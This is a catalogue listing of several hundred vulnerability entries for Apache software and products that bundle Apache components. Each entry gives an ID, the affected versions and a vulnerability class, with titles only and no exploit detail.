| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
| [102536] Apache Ranger up to 0.6 Stored cross site scripting
| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
| [99937] Apache Batik up to 1.8 privilege escalation
| [99936] Apache FOP up to 2.1 privilege escalation
| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
| [99930] Apache Traffic Server up to 6.2.0 denial of service
| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
| [117569] Apache Hadoop up to 2.7.3 privilege escalation
| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
| [99014] Apache Camel Jackson/JacksonXML privilege escalation
| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
| [98605] Apple macOS up to 10.12.3 Apache denial of service
| [98604] Apple macOS up to 10.12.3 Apache denial of service
| [98603] Apple macOS up to 10.12.3 Apache denial of service
| [98602] Apple macOS up to 10.12.3 Apache denial of service
| [98601] Apple macOS up to 10.12.3 Apache denial of service
| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
| [98405] Apache Hadoop up to 0.23.10 privilege escalation
| [98199] Apache Camel Validation XML External Entity
| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
| [97081] Apache Tomcat HTTPS Request denial of service
| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
| [95311] Apache Storm UI Daemon privilege escalation
| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
| [94540] Apache Tika 1.9 tika-server File information disclosure
| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
| [93532] Apache Commons Collections Library Java privilege escalation
| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
| [93098] Apache Commons FileUpload privilege escalation
| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
| [92549] Apache Tomcat on Red Hat privilege escalation
| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
| [90263] Apache Archiva Header denial of service
| [90262] Apache Archiva Deserialize privilege escalation
| [90261] Apache Archiva XML DTD Connection privilege escalation
| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
| [87765] Apache James Server 2.3.2 Command privilege escalation
| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
| [82076] Apache Ranger up to 0.5.1 privilege escalation
| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
| [79791] Cisco Products Apache Commons Collections Library privilege escalation
| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
12819| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
12820| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
12821| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
12822| [78989] Apache Ambari up to 2.1.1 Open Redirect
12823| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
| [78987] Apache Ambari up to 2.0.x cross site scripting
| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
| [77406] Apache Flex BlazeDS AMF Message XML External Entity
| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
| [76567] Apache Struts 2.3.20 unknown vulnerability
| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
| [74793] Apache Tomcat File Upload denial of service
| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
| [74468] Apache Batik up to 1.6 denial of service
| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
| [74174] Apache WSS4J up to 2.0.0 privilege escalation
| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
| [73731] Apache XML Security unknown vulnerability
| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
| [73593] Apache Traffic Server up to 5.1.0 denial of service
| [73511] Apache POI up to 3.10 Deadlock denial of service
| [73510] Apache Solr up to 4.3.0 cross site scripting
| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
| [73173] Apache CloudStack Stack-Based unknown vulnerability
| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
| [72890] Apache Qpid 0.30 unknown vulnerability
| [72887] Apache Hive 0.13.0 File Permission privilege escalation
| [72878] Apache Cordova 3.5.0 cross site request forgery
| [72877] Apache Cordova 3.5.0 cross site request forgery
| [72876] Apache Cordova 3.5.0 cross site request forgery
| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
| [71629] Apache Axis2/C spoofing
| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
| [70809] Apache POI up to 3.11 Crash denial of service
| [70808] Apache POI up to 3.10 unknown vulnerability
| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
| [70749] Apache Axis up to 1.4 getCN spoofing
| [70701] Apache Traffic Server up to 3.3.5 denial of service
| [70700] Apache OFBiz up to 12.04.03 cross site scripting
| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
| [70661] Apache Subversion up to 1.6.17 denial of service
| [70660] Apache Subversion up to 1.6.17 spoofing
| [70659] Apache Subversion up to 1.6.17 spoofing
| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
